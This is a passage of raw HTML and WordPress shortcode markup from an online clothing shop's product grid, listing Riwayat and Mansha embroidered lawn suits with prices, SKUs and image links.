\/><\/div>\t\t<\/a>\n\t\t\t<div class=\"links-on-image\">\n\t\t\t<div class=\"add-links-wrap\">\n\t<div class=\"add-links no-effect clearfix\">\n\t\t<a href=\"https:\/\/pulkash.com\/product\/riwayat-digital-embroidered-luxury-lawn-with-bamber-dupatta-10\/\" data-quantity=\"1\" class=\"viewcart-style-2 button product_type_variable add_to_cart_button\" data-product_id=\"704\" data-product_sku=\"RIW-CH2-10\" aria-label=\"Select options for “RIWAYAT DIGITAL EMBROIDERED LUXURY LAWN WITH BAMBER DUPATTA”\" rel=\"nofollow\">Select options<\/a>\t<\/div>\n\t<\/div>\n\t\t<\/div>\n\t\t\t<\/div>\n\n\t<div class=\"product-content\">\n\t\t<span class=\"category-list\"><a href=\"https:\/\/pulkash.com\/product-category\/new-arrivals\/\" rel=\"tag\">NEW ARRIVALS<\/a>, <a href=\"https:\/\/pulkash.com\/product-category\/women\/stitched\/riwayat-chapter-2\/\" rel=\"tag\">RIWAYAT CHAPTER 2<\/a>, <a href=\"https:\/\/pulkash.com\/product-category\/women\/stitched\/\" rel=\"tag\">STITCHED<\/a>, <a href=\"https:\/\/pulkash.com\/product-category\/women\/\" rel=\"tag\">Women<\/a><\/span>\n\t\t\t<a class=\"product-loop-title\" href=\"https:\/\/pulkash.com\/product\/riwayat-digital-embroidered-luxury-lawn-with-bamber-dupatta-10\/\">\n\t<h3 class=\"woocommerce-loop-product__title\">RIWAYAT DIGITAL EMBROIDERED LUXURY LAWN WITH BAMBER DUPATTA<\/h3>\t<\/a>\n\t\n\t\t\n\t\t\n<form class=\"variations_form cart\" action=\"https:\/\/pulkash.com\/product\/riwayat-digital-embroidered-luxury-lawn-with-bamber-dupatta-10\/\" method=\"post\" enctype='multipart\/form-data' data-product_id=\"704\" data-product_variations=\"[{"attributes":{"attribute_pa_size":""},"availability_html":"<p class=\\"stock in-stock\\">In stock<\\\/p>\\n","backorders_allowed":false,"dimensions":{"length":"","width":"","height":""},"dimensions_html":"N\\\/A","display_price":32.99,"display_regular_price":32.99,"image":{"title":"VIOLET 32.99","caption":"","url":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/VIOLET-32.99.jpeg","alt":"","src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/VIOLET-32.99-600x900.jpeg","srcset":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/VIOLET-32.99-600x900.jpeg 600w, https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/VIOLET-32.99-400x600.jpeg 400w","sizes":"(max-width: 600px) 100vw, 600px","full_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/VIOLET-32.99.jpeg","full_src_w":700,"full_src_h":1050,"gallery_thumbnail_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/VIOLET-32.99-150x150.jpeg","gallery_thumbnail_src_w":150,"gallery_thumbnail_src_h":150,"thumb_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/VIOLET-32.99-600x900.jpeg","thumb_src_w":600,"thumb_src_h":900,"src_w":600,"src_h":900},"image_id":675,"is_downloadable":false,"is_in_stock":true,"is_purchasable":true,"is_sold_individually":"no","is_virtual":false,"max_qty":12,"min_qty":1,"price_html":"","sku":"RIW-CH2-10","variation_description":"","variation_id":705,"variation_is_active":true,"variation_is_visible":true,"weight":"","weight_html":"N\\\/A","image_thumb":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/VIOLET-32.99-150x150.jpeg","image_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/VIOLET-32.99-600x900.jpeg","image_link":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/VIOLET-32.99.jpeg"}]\">\n\t\n\t\t\t<table class=\"variations\" cellspacing=\"0\">\n\t\t\t<tbody>\n\t\t\t\t\t\t\t<\/tbody>\n\t\t<\/table>\n\t\t\n\t\t\n\t\n\t<\/form>\n\n\t<\/div>\n<\/div>\n<\/li>\n\n<li class=\"product-col product-outimage_aq_onimage product type-product post-620 status-publish instock product_cat-mansha product_cat-new-arrivals product_cat-stitched product_cat-women has-post-thumbnail shipping-taxable purchasable product-type-variable\">\n<div class=\"product-inner\">\n\t\n\t<div class=\"product-image\">\n\n\t\t<a href=\"https:\/\/pulkash.com\/product\/mansha-digital-embroidered-luxury-lawn-with-heavy-embroidery-10\/\">\n\t\t\t<div class=\"inner img-effect\"><img width=\"600\" height=\"900\" src=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/red-25.99-600x900.jpeg\" class=\" wp-post-image\" alt=\"\" loading=\"lazy\" srcset=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/red-25.99-600x900.jpeg 600w, https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/red-25.99-400x600.jpeg 400w\" sizes=\"(max-width: 600px) 100vw, 600px\" \/><img width=\"600\" height=\"900\" src=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/red25.99-600x900.jpeg\" class=\"hover-image\" alt=\"\" loading=\"lazy\" srcset=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/red25.99-600x900.jpeg 600w, https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/red25.99-400x600.jpeg 400w\" sizes=\"(max-width: 600px) 100vw, 600px\" \/><\/div>\t\t<\/a>\n\t\t\t<div class=\"links-on-image\">\n\t\t\t<div class=\"add-links-wrap\">\n\t<div class=\"add-links no-effect clearfix\">\n\t\t<a href=\"https:\/\/pulkash.com\/product\/mansha-digital-embroidered-luxury-lawn-with-heavy-embroidery-10\/\" data-quantity=\"1\" class=\"viewcart-style-2 button product_type_variable add_to_cart_button\" data-product_id=\"620\" data-product_sku=\"MAN-CH1-10\" aria-label=\"Select options for “MANSHA DIGITAL EMBROIDERED LUXURY LAWN WITH HEAVY EMBROIDERY”\" rel=\"nofollow\">Select options<\/a>\t<\/div>\n\t<\/div>\n\t\t<\/div>\n\t\t\t<\/div>\n\n\t<div class=\"product-content\">\n\t\t<span class=\"category-list\"><a href=\"https:\/\/pulkash.com\/product-category\/women\/stitched\/mansha\/\" rel=\"tag\">MANSHA<\/a>, <a href=\"https:\/\/pulkash.com\/product-category\/new-arrivals\/\" rel=\"tag\">NEW ARRIVALS<\/a>, <a href=\"https:\/\/pulkash.com\/product-category\/women\/stitched\/\" rel=\"tag\">STITCHED<\/a>, <a href=\"https:\/\/pulkash.com\/product-category\/women\/\" rel=\"tag\">Women<\/a><\/span>\n\t\t\t<a class=\"product-loop-title\" href=\"https:\/\/pulkash.com\/product\/mansha-digital-embroidered-luxury-lawn-with-heavy-embroidery-10\/\">\n\t<h3 class=\"woocommerce-loop-product__title\">MANSHA DIGITAL EMBROIDERED LUXURY LAWN WITH HEAVY EMBROIDERY<\/h3>\t<\/a>\n\t\n\t\t\n\t\t\n<form class=\"variations_form cart\" action=\"https:\/\/pulkash.com\/product\/mansha-digital-embroidered-luxury-lawn-with-heavy-embroidery-10\/\" method=\"post\" enctype='multipart\/form-data' data-product_id=\"620\" data-product_variations=\"[{"attributes":{"attribute_pa_size":""},"availability_html":"<p class=\\"stock in-stock\\">In stock<\\\/p>\\n","backorders_allowed":false,"dimensions":{"length":"","width":"","height":""},"dimensions_html":"N\\\/A","display_price":34.99,"display_regular_price":34.99,"image":{"title":"red 25.99","caption":"","url":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/red-25.99.jpeg","alt":"","src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/red-25.99-600x900.jpeg","srcset":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/red-25.99-600x900.jpeg 600w, https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/red-25.99-400x600.jpeg 400w","sizes":"(max-width: 600px) 100vw, 600px","full_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/red-25.99.jpeg","full_src_w":700,"full_src_h":1050,"gallery_thumbnail_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/red-25.99-150x150.jpeg","gallery_thumbnail_src_w":150,"gallery_thumbnail_src_h":150,"thumb_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/red-25.99-600x900.jpeg","thumb_src_w":600,"thumb_src_h":900,"src_w":600,"src_h":900},"image_id":594,"is_downloadable":false,"is_in_stock":true,"is_purchasable":true,"is_sold_individually":"no","is_virtual":false,"max_qty":12,"min_qty":1,"price_html":"","sku":"MAN-CH1-10","variation_description":"","variation_id":621,"variation_is_active":true,"variation_is_visible":true,"weight":"","weight_html":"N\\\/A","image_thumb":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/red-25.99-150x150.jpeg","image_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/red-25.99-600x900.jpeg","image_link":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/red-25.99.jpeg"}]\">\n\t\n\t\t\t<table class=\"variations\" cellspacing=\"0\">\n\t\t\t<tbody>\n\t\t\t\t\t\t\t<\/tbody>\n\t\t<\/table>\n\t\t\n\t\t\n\t\n\t<\/form>\n\n\t<\/div>\n<\/div>\n<\/li>\n\n<li class=\"product-col product-outimage_aq_onimage product type-product post-648 status-publish last instock product_cat-new-arrivals product_cat-riwayat-chapter-2 product_cat-stitched product_cat-women has-post-thumbnail shipping-taxable purchasable product-type-variable\">\n<div class=\"product-inner\">\n\t\n\t<div class=\"product-image\">\n\n\t\t<a href=\"https:\/\/pulkash.com\/product\/riwayat-digital-embroidered-luxury-lawn-with-bamber-dupatta\/\">\n\t\t\t<div class=\"inner img-effect\"><img width=\"600\" height=\"900\" src=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/brownpink-30.99-600x900.jpeg\" class=\" wp-post-image\" alt=\"\" loading=\"lazy\" srcset=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/brownpink-30.99-600x900.jpeg 600w, https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/brownpink-30.99-400x600.jpeg 400w\" sizes=\"(max-width: 600px) 100vw, 600px\" \/><img width=\"600\" height=\"900\" src=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/brownpink--600x900.jpeg\" class=\"hover-image\" alt=\"\" loading=\"lazy\" srcset=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/brownpink--600x900.jpeg 600w, https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/brownpink--400x600.jpeg 400w\" sizes=\"(max-width: 600px) 100vw, 600px\" \/><\/div>\t\t<\/a>\n\t\t\t<div class=\"links-on-image\">\n\t\t\t<div class=\"add-links-wrap\">\n\t<div class=\"add-links no-effect clearfix\">\n\t\t<a href=\"https:\/\/pulkash.com\/product\/riwayat-digital-embroidered-luxury-lawn-with-bamber-dupatta\/\" data-quantity=\"1\" class=\"viewcart-style-2 button product_type_variable add_to_cart_button\" data-product_id=\"648\" data-product_sku=\"RIW-CH2-01\" aria-label=\"Select options for “RIWAYAT DIGITAL EMBROIDERED LUXURY LAWN WITH BAMBER DUPATTA”\" rel=\"nofollow\">Select options<\/a>\t<\/div>\n\t<\/div>\n\t\t<\/div>\n\t\t\t<\/div>\n\n\t<div class=\"product-content\">\n\t\t<span class=\"category-list\"><a href=\"https:\/\/pulkash.com\/product-category\/new-arrivals\/\" rel=\"tag\">NEW ARRIVALS<\/a>, <a href=\"https:\/\/pulkash.com\/product-category\/women\/stitched\/riwayat-chapter-2\/\" rel=\"tag\">RIWAYAT CHAPTER 2<\/a>, <a href=\"https:\/\/pulkash.com\/product-category\/women\/stitched\/\" rel=\"tag\">STITCHED<\/a>, <a href=\"https:\/\/pulkash.com\/product-category\/women\/\" rel=\"tag\">Women<\/a><\/span>\n\t\t\t<a class=\"product-loop-title\" href=\"https:\/\/pulkash.com\/product\/riwayat-digital-embroidered-luxury-lawn-with-bamber-dupatta\/\">\n\t<h3 class=\"woocommerce-loop-product__title\">RIWAYAT DIGITAL EMBROIDERED LUXURY LAWN WITH BAMBER DUPATTA<\/h3>\t<\/a>\n\t\n\t\t\n\t\t\n<form class=\"variations_form cart\" action=\"https:\/\/pulkash.com\/product\/riwayat-digital-embroidered-luxury-lawn-with-bamber-dupatta\/\" method=\"post\" enctype='multipart\/form-data' data-product_id=\"648\" data-product_variations=\"[{"attributes":{"attribute_pa_size":""},"availability_html":"<p class=\\"stock in-stock\\">In stock<\\\/p>\\n","backorders_allowed":false,"dimensions":{"length":"","width":"","height":""},"dimensions_html":"N\\\/A","display_price":30.99,"display_regular_price":30.99,"image":{"title":"brownpink 30.99","caption":"","url":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/brownpink-30.99.jpeg","alt":"","src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/brownpink-30.99-600x900.jpeg","srcset":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/brownpink-30.99-600x900.jpeg 600w, https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/brownpink-30.99-400x600.jpeg 400w","sizes":"(max-width: 600px) 100vw, 600px","full_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/brownpink-30.99.jpeg","full_src_w":700,"full_src_h":1050,"gallery_thumbnail_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/brownpink-30.99-150x150.jpeg","gallery_thumbnail_src_w":150,"gallery_thumbnail_src_h":150,"thumb_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/brownpink-30.99-600x900.jpeg","thumb_src_w":600,"thumb_src_h":900,"src_w":600,"src_h":900},"image_id":683,"is_downloadable":false,"is_in_stock":true,"is_purchasable":true,"is_sold_individually":"no","is_virtual":false,"max_qty":12,"min_qty":1,"price_html":"","sku":"RIW-CH2-01","variation_description":"","variation_id":649,"variation_is_active":true,"variation_is_visible":true,"weight":"","weight_html":"N\\\/A","image_thumb":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/brownpink-30.99-150x150.jpeg","image_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/brownpink-30.99-600x900.jpeg","image_link":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/brownpink-30.99.jpeg"}]\">\n\t\n\t\t\t<table class=\"variations\" cellspacing=\"0\">\n\t\t\t<tbody>\n\t\t\t\t\t\t\t<\/tbody>\n\t\t<\/table>\n\t\t\n\t\t\n\t\n\t<\/form>\n\n\t<\/div>\n<\/div>\n<\/li>\n\n<li class=\"product-col product-outimage_aq_onimage product type-product post-690 status-publish first instock product_cat-new-arrivals product_cat-riwayat-chapter-2 product_cat-stitched product_cat-women has-post-thumbnail shipping-taxable purchasable product-type-variable\">\n<div class=\"product-inner\">\n\t\n\t<div class=\"product-image\">\n\n\t\t<a href=\"https:\/\/pulkash.com\/product\/riwayat-digital-embroidered-luxury-lawn-with-bamber-dupatta-3\/\">\n\t\t\t<div class=\"inner img-effect\"><img width=\"600\" height=\"900\" src=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/crem30.99-600x900.jpeg\" class=\" wp-post-image\" alt=\"\" loading=\"lazy\" srcset=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/crem30.99-600x900.jpeg 600w, https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/crem30.99-400x600.jpeg 400w\" sizes=\"(max-width: 600px) 100vw, 600px\" \/><img width=\"600\" height=\"900\" src=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/cream-30.99-600x900.jpeg\" class=\"hover-image\" alt=\"\" loading=\"lazy\" srcset=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/cream-30.99-600x900.jpeg 600w, https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/cream-30.99-400x600.jpeg 400w\" sizes=\"(max-width: 600px) 100vw, 600px\" \/><\/div>\t\t<\/a>\n\t\t\t<div class=\"links-on-image\">\n\t\t\t<div class=\"add-links-wrap\">\n\t<div class=\"add-links no-effect clearfix\">\n\t\t<a href=\"https:\/\/pulkash.com\/product\/riwayat-digital-embroidered-luxury-lawn-with-bamber-dupatta-3\/\" data-quantity=\"1\" class=\"viewcart-style-2 button product_type_variable add_to_cart_button\" data-product_id=\"690\" data-product_sku=\"RIW-CH2-03\" aria-label=\"Select options for “RIWAYAT DIGITAL EMBROIDERED LUXURY LAWN WITH BAMBER DUPATTA”\" rel=\"nofollow\">Select options<\/a>\t<\/div>\n\t<\/div>\n\t\t<\/div>\n\t\t\t<\/div>\n\n\t<div class=\"product-content\">\n\t\t<span class=\"category-list\"><a href=\"https:\/\/pulkash.com\/product-category\/new-arrivals\/\" rel=\"tag\">NEW ARRIVALS<\/a>, <a href=\"https:\/\/pulkash.com\/product-category\/women\/stitched\/riwayat-chapter-2\/\" rel=\"tag\">RIWAYAT CHAPTER 2<\/a>, <a href=\"https:\/\/pulkash.com\/product-category\/women\/stitched\/\" rel=\"tag\">STITCHED<\/a>, <a href=\"https:\/\/pulkash.com\/product-category\/women\/\" rel=\"tag\">Women<\/a><\/span>\n\t\t\t<a class=\"product-loop-title\" href=\"https:\/\/pulkash.com\/product\/riwayat-digital-embroidered-luxury-lawn-with-bamber-dupatta-3\/\">\n\t<h3 class=\"woocommerce-loop-product__title\">RIWAYAT DIGITAL EMBROIDERED LUXURY LAWN WITH BAMBER DUPATTA<\/h3>\t<\/a>\n\t\n\t\t\n\t\t\n<form class=\"variations_form cart\" action=\"https:\/\/pulkash.com\/product\/riwayat-digital-embroidered-luxury-lawn-with-bamber-dupatta-3\/\" method=\"post\" enctype='multipart\/form-data' data-product_id=\"690\" data-product_variations=\"[{"attributes":{"attribute_pa_size":""},"availability_html":"<p class=\\"stock in-stock\\">In stock<\\\/p>\\n","backorders_allowed":false,"dimensions":{"length":"","width":"","height":""},"dimensions_html":"N\\\/A","display_price":30.99,"display_regular_price":30.99,"image":{"title":"crem30.99","caption":"","url":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/crem30.99.jpeg","alt":"","src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/crem30.99-600x900.jpeg","srcset":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/crem30.99-600x900.jpeg 600w, https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/crem30.99-400x600.jpeg 400w","sizes":"(max-width: 600px) 100vw, 600px","full_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/crem30.99.jpeg","full_src_w":700,"full_src_h":1050,"gallery_thumbnail_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/crem30.99-150x150.jpeg","gallery_thumbnail_src_w":150,"gallery_thumbnail_src_h":150,"thumb_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/crem30.99-600x900.jpeg","thumb_src_w":600,"thumb_src_h":900,"src_w":600,"src_h":900},"image_id":686,"is_downloadable":false,"is_in_stock":true,"is_purchasable":true,"is_sold_individually":"no","is_virtual":false,"max_qty":12,"min_qty":1,"price_html":"","sku":"RIW-CH2-03","variation_description":"","variation_id":691,"variation_is_active":true,"variation_is_visible":true,"weight":"","weight_html":"N\\\/A","image_thumb":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/crem30.99-150x150.jpeg","image_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/crem30.99-600x900.jpeg","image_link":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/crem30.99.jpeg"}]\">\n\t\n\t\t\t<table class=\"variations\" cellspacing=\"0\">\n\t\t\t<tbody>\n\t\t\t\t\t\t\t<\/tbody>\n\t\t<\/table>\n\t\t\n\t\t\n\t\n\t<\/form>\n\n\t<\/div>\n<\/div>\n<\/li>\n\n<li class=\"product-col product-outimage_aq_onimage product type-product post-606 status-publish instock product_cat-mansha product_cat-new-arrivals product_cat-stitched product_cat-women has-post-thumbnail shipping-taxable purchasable product-type-variable\">\n<div class=\"product-inner\">\n\t\n\t<div class=\"product-image\">\n\n\t\t<a href=\"https:\/\/pulkash.com\/product\/mansha-digital-embroidered-luxury-lawn-with-heavy-embroidery-3\/\">\n\t\t\t<div class=\"inner img-effect\"><img width=\"600\" height=\"900\" src=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/brown-34.99--600x900.jpeg\" class=\" wp-post-image\" alt=\"\" loading=\"lazy\" srcset=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/brown-34.99--600x900.jpeg 600w, https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/brown-34.99--400x600.jpeg 400w\" sizes=\"(max-width: 600px) 100vw, 600px\" \/><img width=\"600\" height=\"900\" src=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/brown-2-600x900.jpeg\" class=\"hover-image\" alt=\"\" loading=\"lazy\" srcset=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/brown-2-600x900.jpeg 600w, https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/brown-2-400x600.jpeg 400w\" sizes=\"(max-width: 600px) 100vw, 600px\" \/><\/div>\t\t<\/a>\n\t\t\t<div class=\"links-on-image\">\n\t\t\t<div class=\"add-links-wrap\">\n\t<div class=\"add-links no-effect clearfix\">\n\t\t<a href=\"https:\/\/pulkash.com\/product\/mansha-digital-embroidered-luxury-lawn-with-heavy-embroidery-3\/\" data-quantity=\"1\" class=\"viewcart-style-2 button product_type_variable add_to_cart_button\" data-product_id=\"606\" data-product_sku=\"MAN-CH1-03\" aria-label=\"Select options for “MANSHA DIGITAL EMBROIDERED LUXURY LAWN WITH HEAVY EMBROIDERY”\" rel=\"nofollow\">Select options<\/a>\t<\/div>\n\t<\/div>\n\t\t<\/div>\n\t\t\t<\/div>\n\n\t<div class=\"product-content\">\n\t\t<span class=\"category-list\"><a href=\"https:\/\/pulkash.com\/product-category\/women\/stitched\/mansha\/\" rel=\"tag\">MANSHA<\/a>, <a href=\"https:\/\/pulkash.com\/product-category\/new-arrivals\/\" rel=\"tag\">NEW ARRIVALS<\/a>, <a href=\"https:\/\/pulkash.com\/product-category\/women\/stitched\/\" rel=\"tag\">STITCHED<\/a>, <a href=\"https:\/\/pulkash.com\/product-category\/women\/\" rel=\"tag\">Women<\/a><\/span>\n\t\t\t<a class=\"product-loop-title\" href=\"https:\/\/pulkash.com\/product\/mansha-digital-embroidered-luxury-lawn-with-heavy-embroidery-3\/\">\n\t<h3 class=\"woocommerce-loop-product__title\">MANSHA DIGITAL EMBROIDERED LUXURY LAWN WITH HEAVY EMBROIDERY<\/h3>\t<\/a>\n\t\n\t\t\n\t\t\n<form class=\"variations_form cart\" action=\"https:\/\/pulkash.com\/product\/mansha-digital-embroidered-luxury-lawn-with-heavy-embroidery-3\/\" method=\"post\" enctype='multipart\/form-data' data-product_id=\"606\" data-product_variations=\"[{"attributes":{"attribute_pa_size":""},"availability_html":"<p class=\\"stock in-stock\\">In stock<\\\/p>\\n","backorders_allowed":false,"dimensions":{"length":"","width":"","height":""},"dimensions_html":"N\\\/A","display_price":34.99,"display_regular_price":34.99,"image":{"title":"brown 34.99","caption":"","url":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/brown-34.99-.jpeg","alt":"","src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/brown-34.99--600x900.jpeg","srcset":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/brown-34.99--600x900.jpeg 600w, https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/brown-34.99--400x600.jpeg 400w","sizes":"(max-width: 600px) 100vw, 600px","full_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/brown-34.99-.jpeg","full_src_w":700,"full_src_h":1050,"gallery_thumbnail_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/brown-34.99--150x150.jpeg","gallery_thumbnail_src_w":150,"gallery_thumbnail_src_h":150,"thumb_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/brown-34.99--600x900.jpeg","thumb_src_w":600,"thumb_src_h":900,"src_w":600,"src_h":900},"image_id":582,"is_downloadable":false,"is_in_stock":true,"is_purchasable":true,"is_sold_individually":"no","is_virtual":false,"max_qty":12,"min_qty":1,"price_html":"","sku":"MAN-CH1-03","variation_description":"","variation_id":607,"variation_is_active":true,"variation_is_visible":true,"weight":"","weight_html":"N\\\/A","image_thumb":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/brown-34.99--150x150.jpeg","image_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/brown-34.99--600x900.jpeg","image_link":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/brown-34.99-.jpeg"}]\">\n\t\n\t\t\t<table class=\"variations\" cellspacing=\"0\">\n\t\t\t<tbody>\n\t\t\t\t\t\t\t<\/tbody>\n\t\t<\/table>\n\t\t\n\t\t\n\t\n\t<\/form>\n\n\t<\/div>\n<\/div>\n<\/li>\n<\/ul>\n<\/div><\/div>[\/vc_column][\/vc_row][vc_row content_placement=”middle” wrap_container=”yes” css=”.vc_custom_1605237378131{background-color: #d8dce5 !important;}” el_class=”home-trending”][vc_column el_class=”porto-ibanner-layer position-static pt-5 pb-lg-5″ offset=”vc_col-md-6″][vc_custom_heading text=”Volume 1″ font_container=”tag:h4|font_size:1.3125em|text_align:left|color:rgba(34%2C37%2C41%2C0.7)|line_height:1″ use_theme_fonts=”yes” font_weight=”500″ letter_spacing=”.125em” animation_delay=”200″ el_class=”mb-1″]<div class=\"porto-u-heading d-inline-block mb-4 pb-2 wpb_custom_95aa9a11c17ad45cfabaf210d84ee7cc\" data-hspacer=\"no_spacer\" data-halign=\"right\" style=\"text-align:right\"><div class=\"porto-u-main-heading\"><h2 style=\"font-weight:700;margin-bottom: 4px;font-size:4em;line-height:1.1;\">Digital Lawn<\/h2><\/div><div class=\"porto-u-sub-heading\" style=\"\">\n<h6 class=\"d-inline-block m-r-sm\" style=\"font-size: 0.8125em; line-height: 1; font-weight: bold; letter-spacing: -0.02em;\">starting from<\/h6>\n<h5 class=\"d-inline-block background-color-secondary mb-0 sale-text heading-light\" style=\"font-size: 0.875em; line-height: 1; letter-spacing: -0.02em;\">\u00a3<strong>30.<\/strong>99<\/h5>\n<p><\/div><\/div>[\/vc_column][vc_column width=”2\/3″ animation_delay=”1200″ offset=”vc_col-md-4″ el_class=”z-index-2″][vc_single_image image=”763″ img_size=”full” alignment=”center” el_class=”mb-0 img-block”]\r\n<div class=\"porto-hotspot pos-right\" style=\"left:36%;top:47%;\">\r\n\t<i class=\"porto-hotspot-icon fas fa-circle\"><\/i>\r\n\t<div class=\"popup-wrap\">\r\n\t<div class=\"porto-products wpb_content_element\"><div class=\"woocommerce \"><ul class=\"products products-container grid pcols-lg-1 pcols-md-1 pcols-xs-1 pcols-ls-1 pwidth-lg-1 pwidth-md-1 pwidth-xs-1 pwidth-ls-1 is-shortcode\"\n\t data-cur_page=\"1\" data-max_page=\"1\" data-product_layout=\"product-outimage\">\n\n<li class=\"product-col product-outimage product type-product post-694 status-publish first instock product_cat-new-arrivals product_cat-riwayat-chapter-2 product_cat-stitched product_cat-women has-post-thumbnail shipping-taxable purchasable product-type-variable\">\n<div class=\"product-inner\">\n\t\n\t<div class=\"product-image\">\n\n\t\t<a href=\"https:\/\/pulkash.com\/product\/riwayat-digital-embroidered-luxury-lawn-with-bamber-dupatta-5\/\">\n\t\t\t<div class=\"inner img-effect\"><img width=\"600\" height=\"900\" src=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/MINTGREN-600x900.jpeg\" class=\" wp-post-image\" alt=\"\" loading=\"lazy\" srcset=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/MINTGREN-600x900.jpeg 600w, https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/MINTGREN-400x600.jpeg 400w\" sizes=\"(max-width: 600px) 100vw, 600px\" \/><img width=\"600\" height=\"900\" src=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/MINT-GREEN-600x900.jpeg\" class=\"hover-image\" alt=\"\" loading=\"lazy\" srcset=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/MINT-GREEN-600x900.jpeg 600w, 